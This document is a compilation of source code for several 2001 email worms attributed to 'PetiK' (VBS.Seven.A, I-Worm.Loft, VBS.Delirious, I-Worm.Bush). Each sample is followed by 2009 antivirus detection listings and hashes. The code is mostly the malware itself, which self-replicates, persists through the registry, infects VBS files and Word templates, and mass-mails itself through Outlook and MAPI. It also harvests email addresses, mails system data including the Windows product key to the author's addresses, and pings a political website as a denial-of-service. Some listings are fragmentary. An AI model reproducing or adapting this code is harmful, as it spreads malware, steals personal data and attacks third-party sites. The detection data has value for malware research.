' Action : It copies itself to \WINDOWS\Seven.vbs, \WINDOWS\SYSTEM\Envy.vbs,
' and \WINDOWS\TEMP\Lust.vbs. It adds values in Run key (Envy) and in
' Runservices key (Lust). When the current day is 1st, 15th or 30th it adds
' value in Run key of HKCU (Anger=rundll32 mouse,disable). That disable
' the mouse in each start. When the current day is 12th or 28th it displays a
' message box. It closes Windows when the user click on “OK”.
' When the day is 14th it shows an other message it displays a message.
' When the user click on “OK”, the worm disables the keyboard.
' when the day is 5th or 17th, it changes some values in regedit. When the
' user want open a TXT file, “\WINDOWS\Seven.vbs” starts. The VBS icon is
' replaced by the TXT icon.
' It infects after all VBS files that it founds on the disk and adds some
' at the end of the file to run \WINDOWS\Seven.vbs when the file is ran.
' The worm ues Outlook to spread too :
' Subject : What is the seven sins ??
' Body : Look at this file and learn them.
' Attached : Seven.vbs
'VBS.Seven.A
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set tmp=fso.GetSpecialFolder(2)
SEVEN()
Sub SEVEN()
Set org=fso.GetFile(WScript.ScriptFullname)
org.Copy(win&"\Seven.vbs")
org.Copy(sys&"\Envy.vbs")
org.Copy(tmp&"\Lust.vbs")
run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Envy")
runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Lust")
ws.RegWrite run,sys&"\Envy.vbs"
ws.RegWrite runs,tmp&"\Lust.vbs"
First()
Second()
Third()
Disk()
Send()
End Sub
Sub First()
If Day(Now)=1 or Day(Now)=15 or Day(Now)=30 Then
run2=("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Anger")
ws.RegWrite run2,"rundll32 mouse,disable"
End If
End Sub
Sub Second()
If Day(Now)=12 or Day(Now)=28 Then
MsgBox "You're tired now"+VbCrLf+"Switch off you're Computer",vbExclamation,"Seven"
ws.Run "rundll32.exe user.exe,exitwindows"
End If
If Day(Now)=14 Then
MsgBox "The keyboard is on strike !",vbInformation,"Seven"
ws.Run "rundll32 keyboard,disable"
End If
End Sub
Sub Third()
If Day(Now)=5 or Day(Now)=17 Then
bur=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Sh
ell Folders\Desktop")
if not fso.FileExists(win&"\COPYRIGHT.txt.vbs") Then
txt=ws.RegRead("HKCR\txtfile\shell\open\command\")
ws.RegWrite "HKCR\txtfile\shell\open\command\Pride",txt
ws.RegWrite "HKCR\txtfile\shell\open\command\","wscript "&win&"\Seven.vbs"
icot=ws.RegRead("HKCR\txtfile\DefaultIcon\")
icov=ws.RegRead("HKCR\VBSfile\DefaultIcon\")
ws.RegWrite "HKCR\VBSfile\DefaultIcon\oldicon",icov
ws.RegWrite "HKCR\VBSfile\DefaultIcon\",icot
Set copy=fso.CreateTextFile (bur&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK
(c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
Set copy=fso.CreateTextFile (win&"\COPYRIGHT.txt.vbs")
copy.WriteLine "MsgBox ""You're infected by my new Worm""+VbCrLf+VbCrLf+"" By PetiK
(c)2001"",vbcritical,""VBS.Seven.A"""
copy.Close
end if
End If
End Sub
Sub Disk
Set dr=fso.Drives
For Each d in dr
list(d.path&"\")
end If
Next
End Sub
Sub infect(dossier)
Set f=fso.GetFolder(dossier)
Set fc=f.Files
For each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
If (ext="vbs") Then
Set cot=fso.OpenTextFile(f1.path, 1, False)
If cot.ReadLine <> "'VBS.Seven.A" then
cot.Close
Set cot=fso.OpenTextFile(f1.path, 1, False)
vbsorg=cot.ReadAll()
cot.Close
Set inf=fso.OpenTextFile(f1.path,2,True)
inf.WriteLine "'VBS.Seven.A"
inf.Write(vbsorg)
inf.WriteLine ""
inf.WriteLine "Set w=CreateObject(""WScript.Shell"")"
inf.WriteLine "Set f=CreateObject(""Scripting.FileSystemObject"")"
inf.WriteLine "w.run f.GetSpecialFolder(0)&""\Seven.vbs"""
inf.Close
End If
End If
Next
End Sub
Sub list(dossier)
Set f=fso.GetFolder(dossier)
Set sf=f.SubFolders
For each f1 in sf
infect(f1.path)
list(f1.path)
Next
End Sub
Sub Send()
Set A=CreateObject("Outlook.Application")
Set B=A.GetNameSpace("MAPI")
For D=1 To C.AddressEntries.count
Set E=C.AddressEntries(D)
Set F=A.CreateItem(0)
F.To=E.Address
F.Subject="What is the seven sins ??"
F.Body="Look at this file and learn them."
Set G=CreateObject("Scripting.FileSystemObject")
F.Attachments.Add G.BuildPath(G.GetSpecialFolder(0),"Seven.vbs")
F.DeleteAfterSubmit=True
If F.To <> "" Then
F.Send
End If
Next
End If
Next
End Sub
File Seven.vbs received on 05.16.2009 19:29:21 (CET)

AntiVir 7.9.0.168 2009.05.15 Worm/Petik.I
Authentium 5.1.2.4 2009.05.16 VBS/Petik.S@mm
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.9CAAED1A
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.I
ClamAV 0.94.1 2009.05.16 Worm.Petik.I
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 VBS.SillyWorm.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Chism
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.S@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.i
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.I
GData 19 2009.05.16 Generic.ScriptWorm.9CAAED1A
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.i
McAfee 5616 2009.05.15 VBS/Chism
McAfee+Artemis 5616 2009.05.15 VBS/Chism
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.I
Microsoft 1.4602 2009.05.16 Virus:VBS/Chism
NOD32 4080 2009.05.15 VBS/Chism
Norman 6.01.05 2009.05.16 VBS/Chism.A@mm
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.I@mm
Panda 10.0.0.14 2009.05.16 VBS/Petik.I
PCTools 4.4.2.0 2009.05.16 VBS.Seven.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik.i
Sophos 4.41.0 2009.05.16 VBS/Seven-A
Sunbelt 3.2.1858.2 2009.05.16 -
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.I-O
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.i
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Seven.A
MD5...: 8781b9a791c0c144e97a466486f6ef33
SHA1..: 6872bc5747eb4701e579305c68c517e712f680ec
comment #
Name : I-Worm.Loft
Author : PetiK
Date : June 16th - June 22nd
Size : 8704 byte
Action : If the file is not \WINDOWS\SYSTEM\LOFT.EXE, it copies to this file and alters
the run= line in the WIN.INI file to run in each start. It copies to
\WINDOWS\LOFT_STORY.EXE too
Otherwise, it checks if exists the key HKCU\Software\Microsoft\PetiK. If not exists, the
worm creates the file "Loft.htm" in the StartUp folder. When the user will accept the
ActiveX of this page, It modifies the start page of Internet Explorer to download the
file ActiveX.vbs.
This file send differents information about the computer to three addresses :
loftptk@multimania(castaldi), petik@multimania.com(vlad14) and euphoria@ctw.net(pk29a).
It displays a message all the 28th of the month and modifies the start page of internet
and RegisteredOwner and RegisteredOrganization. It check if exist a internet connection.
If not exist, it makes a loop all the five seconds or else it displays a message.
It scans after all *.htm* file in the "Temporary Internet Files" to find email address.
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc
DEBUT:
VERIF: push 00h
push 50
push offset szOrig
push eax
push 50h
push offset szCopie
@pushsz "\LOFT.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopieb
@pushsz "\LOFT_STORY.EXE"
callx lstrcat
push offset szOrig

push offset szCopie
callx lstrcmp
test eax,eax
jz C_PTK
COPIE: push 00h

push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szOrig
callx CopyFileA
WININI: push 50
@pushsz "\\WIN.INI"
callx lstrcat
push offset szCopie
@pushsz "run"
@pushsz "windows"
MESSAGE:push 1040h
@pushsz "Loft Story"
@pushsz "I'm fucking the Loft Story"
push 00h
callx MessageBoxA
jmp FIN
C_PTK: push offset regDisp

push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h
push 00h
@pushsz "Software\Microsoft\PetiK"
callx RegCreateKeyExA
cmp [regDisp],2
je DATE
push [regResu]
callx RegCloseKey
STA_UP: push offset RegHandle

push 001F0000h ; KEY_QUERY_VALUE
push 00h
@pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
push HKEY_USERS
callx RegOpenKeyExA
test eax,eax
jnz FIN

push offset Buffer
push 00h ;ValueType
push 00h
@pushsz "Startup"
push RegHandle
callx RegQueryValueExA
push [RegHandle]
callx RegCloseKey
CR_HTM: @pushsz "\Loft.htm"

push offset Buffer
call lstrcat
push 00h
push CREATE_ALWAYS
push 00h
push GENERIC_WRITE
push offset Buffer
callx CreateFileA
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHandle]
callx WriteFile
push [FileHandle]
callx CloseHandle
jmp DLL

callx GetSystemTime
cmp [SystemTime.wDay],28
jne DLL
SHSET: @pushsz "SHLWAPI.dll"
callx LoadLibraryA
test eax,eax
jz DLL
mov hdll2,eax
@pushsz "SHSetValueA"
push hdll2
test eax,eax
jz DLL
mov setvalue,eax
WEB: push 08h
@pushsz "http://www.loftstory.fr"
push 01h
@pushsz "Start Page"
@pushsz "Software\Microsoft\Internet Explorer\Main"
call [setvalue]
push 08h
@pushsz "LoftStory"
push 01h
@pushsz "RegisteredOrganization"
@pushsz "Software\Microsoft\Windows\CurrentVersion"
call [setvalue]
push 08h
@pushsz "Aziz, Kenza, Loanna, etc..."
push 01h
@pushsz "RegisteredOwner"
call [setvalue]
push [hdll2]
callx FreeLibrary
push 40h
@pushsz "I-Worm.LoftStory"
@pushsz "New Worm Internet coded by PetiK (c)2001"
push 00h
callx MessageBoxA
DLL: @pushsz "WININET.dll"

callx LoadLibraryA
test eax,eax
jz FIN
mov hdll,eax
@pushsz "InternetGetConnectedState"
push hdll
test eax,eax
jz FIN
mov netcheck,eax
jmp NET
DODO: push 5000
callx Sleep
NET: push 00h
push offset Temp
call [netcheck]
dec eax
jnz DODO
NET_OK: push 40h
@pushsz "Loft Story"
@pushsz "Welcome to Internet !"
push 00h
callx MessageBoxA
FINDLL: push [hdll]
callx FreeLibrary
REG: push offset RegHandle

push 001F0000h ; KEY_QUERY_VALUE
push 00h
@pushsz ".DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
push HKEY_USERS
callx RegOpenKeyExA
test eax,eax
jnz FIN

push offset Buffer
push 00h ;ValueType
push 00h
@pushsz "Cache"
push RegHandle
push [RegHandle]
callx RegCloseKey
TIF_CUR:push offset Buffer

callx SetCurrentDirectoryA
call FFF
FIN: push 00h

callx ExitProcess
FFF: push offset HTM

@pushsz "*.htm*"
callx FindFirstFileA
mov edi,eax
cmp eax,-1
je FIN
P_HTM: call parse_html
FNF: push offset HTM
push edi
callx FindNextFileA
test eax,eax
jnz P_HTM
FC: push edi
callx FindClose
ret
parse_html:
pushad
push 00h
push OPEN_EXISTING
push 00h
push GENERIC_READ
push offset HTM.FileName
callx CreateFileA ;open the file
inc eax
je FIN
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA ;create the file mapping
test eax,eax
je ph_close
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile ;map the file
test eax,eax
je ph_close2
xchg eax,esi
push 00h
push ebx
callx GetFileSize ;get its size
xchg eax,ecx
jecxz ph_close3
ls_scan_mail:
call @mt
db 'mailto:'
@mt: pop edi
l_scan_mail:
pushad
push 7
pop ecx
rep
cmpsb ;search for "mailto:"
popad ;string
je scan_mail ;check the mail address
inc esi
loop l_scan_mail ;in a loop
ph_close3:
push esi
callx UnmapViewOfFile ;unmap view of file
ph_close2:
push ebp
callx CloseHandle ;close file mapping
ph_close:
push ebx
callx CloseHandle ;close the file
popad
ret
scan_mail:
xor edx,edx
add esi,7
mov edi,offset mail_address ;where to store the
push edi ;mail address
n_char: lodsb
cmp al,' '
je s_char
cmp al,'"'
je e_char
cmp al,''''
je e_char
cmp al,'@'
jne o_a
inc edx
o_a: stosb
jmp n_char
s_char: inc esi
jmp n_char
e_char: xor al,al
stosb
pop edi
test edx,edx ;if EDX=0, mail is not
je ls_scan_mail ;valid (no '@')
call mapi_init
test eax,eax
jne ls_scan_mail
call send
call close
jmp ls_scan_mail
mapi_init:
xor eax,eax
push offset MAPIHandle
push eax
push eax
push eax
push eax
push eax
callx MAPILogon
ret
send: xor eax,eax

push eax
push eax
push offset sMessage
push eax
push [MAPIHandle]
callx MAPISendMail
ret
close: xor eax,eax

push eax
push eax
push eax
push 12345678h
MAPIHandle = dword ptr $-4
callx MAPILogoff
ret
add_ad: ;@pushsz "C:\carnet.txt"

;push offset mail_address
;push offset mail_address
;@pushsz "Carnet d'adresses"
;callx WritePrivateProfileStringA
ret
.data
htmd: db '<html><head><title>Loft Story WEB Page</title></head>',0dh,0ah
db '<font face=''verdana'' color=green size=''2''>Please accept ActiveX '
db 'to see this page<br><br> Internet Explorer<br><br> </font>',0dh,0ah
db '<SCRIPT Language=VBScript>',0dh,0ah
db 'Set w=CreateObject("WScript.Shell")',0dh,0ah
db 'w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ActiveX 1.0",'
db '"C:\ActiveX.vbs"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Download Directory",'
db '"C:\"',0dh,0ah
db 'document.write "Please download the file ""ActiveX.vbs"" to correct a bug '
db 'in Internet Explorer"',0dh,0ah
db 'document.write "<br>Connect you to internet to download the file<br>"',0dh,0ah
db 'document.write "<br><h2>If you don''t accept ActiveX the syntax
failed<h2>"',0dh,0ah
db 'w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",'
db '"http://www.ctw.net/euphoria/ActiveX.vbs"',0dh,0ah
db '</SCRIPT></body></html>',0dh,0ah
HTMTAILLE equ $-htmd

szCopieb db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
FileHandle dd ?
RegHandle dd ?
regDisp dd 0
regResu dd 0
octets dd ?
hdll dd ?
hdll2 dd ?
netcheck dd ?
setvalue dd ?
mail_address db 128 dup (?)
Temp dd 0
ValueType dd 0
sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
dd offset mFrom
dd 1
dd offset mTo
dd 1
dd offset attach
subject db "Loft Story News...",00h

body db "The last video of the <Loft story> program",00h
date db "07/01/2001",00h
sender db "b_castaldi@loftstory.fr",00h
mFrom dd ?
dd ?
dd offset mFrom
dd offset sender
dd ?
dd ?
mTo dd ?
dd 1
dd offset mTo
dd offset mail_address
dd ?
dd ?
attach dd ?
dd ?
dd ?
dd offset szCopieb
dd ?
dd ?

FILE_END equ 00000002h
HKEY_USERS equ 80000003h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
filetime struct
LowDateTime dd ?
HighDateTime dd ?
filetime ends
win32 struct
Fileattributes dd ?
CreationTime filetime ?
LastAccessTime filetime ?
LastWriteTime filetime ?
FileSizeHigh dd ?
FileSizeHow dd ?
Reserved0 dd ?
Reserved1 dd ?
FileName dd 260 (?)
AlternativeName db 13 dup (?)
db 3 dup (?)
win32 ends
HTM win32 <>
end DEBUT
end
ACTIVEX.VBS

Set f=CreateObject("Scripting.FileSystemObject")
Set ws=Wscript.CreateObject("WScript.Shell")
startup=ws.SpecialFolders("Startup")
If f.FileExists (startup&"\Loft.htm") Then
f.DeleteFile (startup&"\Loft.htm")
MsgBox "Patch for Internet Explorer installed",vbinformation,"Patch v1.0"
MsgBox "You can delete this file",vbinformation,"Patch v1.0"
End If
CN=CreateObject("WScript.NetWork").ComputerName
UN=CreateObject("WScript.NetWork").UserName
UD=CreateObject("WScript.NetWork").UserDomain
NOM=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
ENT=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization")
PI=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductId")
PK=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProductKey")
V=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Version")
VN=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\VersionNumber")
P=w.RegRead("HKCU\Software\Microsoft\Internet Explorer\International\AcceptLanguage")
Set m=O.CreateItem(0)
m.To = "loftptk@multimania.com"
m.BCC = "petik@multimania.com; euphoria@ctw.net"
m.Subject="Loft Info arrivant de " & P
n = "Date : " & date
n = n & VbCrLf & "Heure : " & time
n = n & VbCrLf & "Nom d'enregistrement : " & NOM
n = n & VbCrLf & "Nom de l'organization : " & ENT
n = n & VbCrLf & "Numéro d'identification : " & PI
n = n & VbCrLf & "Numéro d'enregistrement : " & PK
n = n & VbCrLf & "Version de Windows : " & V & " " & VN
n = n & VbCrLf & "Nom de l'ordinateur : " & CN
n = n & VbCrLf & "Nom de domaine : " & UD
n = n & VbCrLf & "Nom d'utilisateur : " & UN
m.Body = n
m.DeleteAfterSubmit=True
m.Send
w.RegWrite "HKCU\Software\Microsoft\PetiK\LoftInfo","OK"
Page","http://www.yahoo.fr"
File Loft.exe received on 05.16.2009 17:51:42 (CET)
AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.8704.B
Authentium 5.1.2.4 2009.05.16 W32/Malware!cec4
Avast 4.8.1335.0 2009.05.15 Win32:Petik-LoftStory
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.F
BitDefender 7.2 2009.05.16 Win32.Ltof.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Worm.Win32.Petik.K
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8704
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8704.B
F-Prot 4.4.4.56 2009.05.16 W32/Malware!cec4
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.E
GData 19 2009.05.16 Win32.Ltof.A@mm
Microsoft 1.4602 2009.05.16 Worm:Win32/PetTick@mm
NOD32 4080 2009.05.15 Win32/Petik.K
Panda 10.0.0.14 2009.05.16 W32/Petik.K
PCTools 4.4.2.0 2009.05.16 HTML.Loft.A
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.i
Sophos 4.41.0 2009.05.16 W32/Petik-K
TrendMicro 8.950.0.1092 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 HTML.Loft.A
MD5...: ee8e03e0a5251a340fe2c08fd7f9c2e4
SHA1..: 4144791ec8571744fe9905309bb6bf7199485a37
' Name : VBS.Delirious
' Author : PetiK
' Language : VBS
' Date : 28/06/2001
' Copy itself to %WINDIR%\Delirious.vbs

' Run in each start by writing new value in
' HKLM\Software\Microsoft\Windows\CurrentVersion\Run
' Display a fake message if it's not Delirious.vbs
' Infect all VBS files
' Infect Normal.dot
' Spread with Outlook

Set sf=CreateObject("Scripting.FileSystemObject")
Set fl=sf.OpenTextFile(WScript.ScriptFullName,1)
virus=fl.ReadAll
Set win=sf.GetSpecialFolder(0)
Set sys=sf.GetSpecialFolder(1)
Set cpy=sf.GetFile(WScript.ScriptFullName)
cpy.Copy(win&"\Delirious.vbs")
r=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Delire")
ws.RegWrite r,(win&"\Delirious.vbs")
If cpy <> (win&"\Delirious.vbs") Then

MsgBox cpy&" is not a VBS file valid.",vbcritical,cpy
else
Disque()
Word()
Spread()
If Day(Now)=1 Then
MsgBox "Look at my new virus !"+VbCrLf+"Delirious, isn't
it ??",vbinformation,"VBS.Delirious coded by PetiK (c)2001"
End If
bureau=ws.SpecialFolders("Desktop")
Set link=ws.CreateShortCut(bureau&"\Site_Web.url")
link.TargetPath="http://www.jememarre.com"
link.Save
End If
Sub Disque
If not sf.FileExists (sys&"\DeliriousFile.txt") Then
Set DF=sf.CreateTextFile(sys&"\DeliriousFile.txt")
DF.WriteLine "Infected file by VBS.Delirious"
DF.WriteLine "Fichiers infectés par VBS.Delirious :"
DF.WriteBlankLines(1)
DF.Close
End If
Set dr=sf.Drives
For Each d in dr
liste(d.path&"\")
End If
Next
End Sub
Sub infection(dossier)
Set f=sf.GetFolder(dossier)
Set fc=f.Files
For Each F in fc
ext=sf.GetExtensionName(F.path)
ext=lcase(ext)
If (ext="vbs") Then
Set verif=sf.OpenTextFile(F.path, 1, False)
If verif.ReadLine <> "'VBS.Delirious" Then
tout=verif.ReadAll()
verif.Close
Set inf=sf.OpenTextFile(F.path, 2, True)
inf.Write(virus)
inf.Write(tout)
inf.Close
Set DF=sf.OpenTextFile(sys&"\DeliriousFile.txt", 8, True)
DF.WriteLine F.path
DF.Close
End If
End If
Next
End Sub
Sub liste(dossier)
Set f=sf.GetFolder(dossier)
Set sd=f.SubFolders
For Each F in sd
infection(F.path)
liste(F.path)
Next
End Sub
Sub Word()
Set CODE=sf.CreateTextFile(sys&"\DeliriousCode.txt")
CODE.Write(virus)
CODE.Close
If ws.RegRead("HKLM\Software\Microsoft\Delirious\InfectNormal") <> "OK" Then
Set wrd=WScript.CreateObject("Word.Application")
wrd.Visible=False
Set NorT=wrd.NormalTemplate.VBProject.VBComponents
NorT.Import sys&"\DeliriousCode.txt"
wrd.Run "Normal.ThisDocument.AutoExec"
wrd.Quit
ws.RegWrite "HKLM\Software\Microsoft\Delirious\InfectNormal","OK"
End If
End Sub
Sub Spread()
WHO=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner")
Set OA=CreateObject("Outlook.Application")
Set MA=OA.GetNameSpace("MAPI")
For Each C In MA.AddressLists
For D=1 To C.AddressEntries.Count
Set AD=C.AddressEntries(D)
Set EM=OA.CreateItem(0)
EM.To=AD.Address
EM.Subject="Delirious EMail from " & WHO
body="Hi " & AD.Name & ","
body = body & VbCrLf & "Look at this funny attached."
body = body & VbCrLf & ""
body = body & VbCrLf & " Best Regards " & WHO
EM.Body=body
EM.Attachments.Add(win&"\Delirious.vbs")
EM.DeleteAfterSubmit=True
If EM.To <> "" Then
EM.Send
End If
Next
End If
Next
End Sub
File Delirious.vbs received on 05.16.2009 11:30:16 (CET)

Authentium 5.1.2.4 2009.05.15 VBS/Petik.A@mm
AVG 8.5.0.336 2009.05.15 I-Worm/Petik
BitDefender 7.2 2009.05.16 Generic.ScriptWorm.FCCA075D
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.H
ClamAV 0.94.1 2009.05.15 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Petik
eSafe 7.0.17.0 2009.05.14 VBS.MailSender.
F-Prot 4.4.4.56 2009.05.15 VBS/Petik.A@mm
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.H@mm
GData 19 2009.05.16 Generic.ScriptWorm.FCCA075D
K7AntiVirus 7.10.735 2009.05.14 -
McAfee 5616 2009.05.15 VBS/Louse@MM
McAfee+Artemis 5616 2009.05.15 VBS/Louse@MM
Microsoft 1.4602 2009.05.16 Virus:VBS/Louse@mm.gen
Norman 6.01.05 2009.05.16 VBS/Louse.A@mm
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.L@mm
Panda 10.0.0.14 2009.05.15 VBS/Petik.H
PCTools 4.4.2.0 2009.05.15 VBS.Petik.H
Prevx 3.0 2009.05.16 -
Sophos 4.41.0 2009.05.16 VBS/Petik-H
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.C@m
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.H
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Petik.H
MD5...: 6e8ba64159c0520ecd7781951dd11fca
SHA1..: 3a176e6646fd14f44074dd9d59122278bafe608c
SHA256: bd2901cb43b873fb0ba5573641a56d24c066069302c7e275555665b12c86a2d8
comment #
Name : I-Worm.Bush
Author : PetiK
Date : July 1st
Size : 8192 byte
Action : If the file is not \WINDOWS\SYSTEM\BIOS.EXE, it copies to this file and alters
the run=
line in the WIN.INI file to run in each start. It copies to \WINDOWS\Bush.exe too
Otherwise, it creates \WINDOWS\Carnet.vbs and executed it. It adds a value in Reun key to
run this file in each start. If the file exists, it makes nothing.
After, it checks if the user is connected. If it finds a connection, it displays a
message and send a copy of him to the addresses found with the VBS file.
At the end, it attacks the site of G.W.Bush on the Wednesday.
To compil :
tasm32 /M /ML Bush
tlink32 -Tpe -aa -x Bush,,,import32
C:\TASM32\BIN\brc32 bush.rc
#
.586p
.model flat
.code
callx macro a
extrn a:proc
call a
endm
include useful.inc
SIGNATURE db "I-Worm.Bush "

db "by PetiK (c) 2001",00h
DEBUT:
VERIF: push 00h
push 50
push offset szOrig
push eax
push 50h
push offset szCopie
@pushsz "\BIOS.EXE"
push offset szCopie
callx lstrcat
push 50h
@pushsz "\Bush.exe"
callx lstrcat
push offset szOrig

push offset szCopie
callx lstrcmp
test eax,eax
jz CAR_A
COPIE: push 00h

push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szOrig
callx CopyFileA
WININI: push 50
@pushsz "\\WIN.INI"
callx lstrcat
push offset szCopie
@pushsz "run"
@pushsz "windows"
MESSAGE:push 30h
@pushsz "Error Load Library"
@pushsz "Cannot run the Dynamic Link Library GWBios.dll"
push 00h
callx MessageBoxA
jmp FIN
CAR_A: push 50
push offset szCarnet
@pushsz "\Carnet.vbs"
callx lstrcat
push 00h
push CREATE_NEW
push 00h
push GENERIC_WRITE
callx CreateFileA
cmp eax,-1
je DLL
mov [FH],eax
push 00h
push offset octets
push VBSTAILLE
push offset vbsd
push [FH]
callx WriteFile
push [FH]
callx CloseHandle
REG: @pushsz "SHLWAPI.dll"

callx LoadLibraryA
test eax,eax
jz DLL
mov hdll,eax
push hdll
test eax,eax
jz DLL
mov setvalue,eax
RUN_C: push 08h
push 01h
@pushsz "Carnet d'adresses"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
call setvalue
push [hdll]
callx FreeLibrary
DLL: @pushsz "WININET.dll"

callx LoadLibraryA
test eax,eax
jz FIN
mov hdll,eax
push hdll
test eax,eax
jz FIN
mov netcheck,eax
jmp NET
DODO: push 10000
callx Sleep
NET: push 00h
push offset Temp
call [netcheck]
dec eax
jnz DODO
NET_OK: push 40h

@pushsz "G.W.Bush"
@pushsz "The man who want to kill poeple and the earth"
push 00h
callx MessageBoxA
FINDLL: push [hdll]
callx FreeLibrary
JOUR: push offset SystemTime
callx GetSystemTime
jne JOUR2
DoS: push 01h

@pushsz "ping -l 10000 -t www.georgewbush.com"
callx WinExec
push 40h
@pushsz "Internet"
@pushsz "You can go to the web site : www.georgewbush.com"
push 00h
callx MessageBoxA
JOUR2: push offset SystemTime

callx GetSystemTime
cmp [SystemTime.wDay],25
jne TXT
push 40h
@pushsz "I-Worm.Bush"
@pushsz "Coded by PetiK (c)2001. To show my anger against this man."
push 00h
callx MessageBoxA
TXT: pushad
push 50
push offset szCarnet2
@pushsz "\Carnet.txt"
callx lstrcat
push 00h
push OPEN_EXISTING
push 00h
push GENERIC_READ
callx CreateFileA
cmp eax,-1
je RETOUR
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je CL1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je CL2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz CL3
d_scan_mail:
call @mlt
db 'mailto:'
@mlt: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
CL3: push esi

callx UnmapViewOfFile
CL2: push ebp
callx CloseHandle
CL1: push ebx
callx CloseHandle
RETOUR: popad
FIN: push 00h

callx ExitProcess
scan_mail:
xor edx,edx
add esi,7 ;size of the string MAILTO:
mov edi,offset m_addr
push edi
p_car: lodsb
cmp al,' '
je car_s
cmp al,'"'
je car_f
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_car
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ;if edx=0 no @
je d_scan_mail
call send
jmp d_scan_mail
send: xor eax,eax

push eax
push eax
push offset sMessage
push eax
push [MAPIh]
callx MAPISendMail
ret
.data
szCarnet db 50 dup (0)
szCarnet2 db 50 dup (0)
szCopieb db 50 dup (0)
FH dd ?
octets dd ?
hdll dd ?
netcheck dd ?
setvalue dd ?
shfolder dd ?
m_addr db 128 dup (?)
Temp dd 0
MAPIh dd 0
sMessage dd ?
dd offset subject
dd offset body
dd ?
dd offset date
dd ?
dd 2
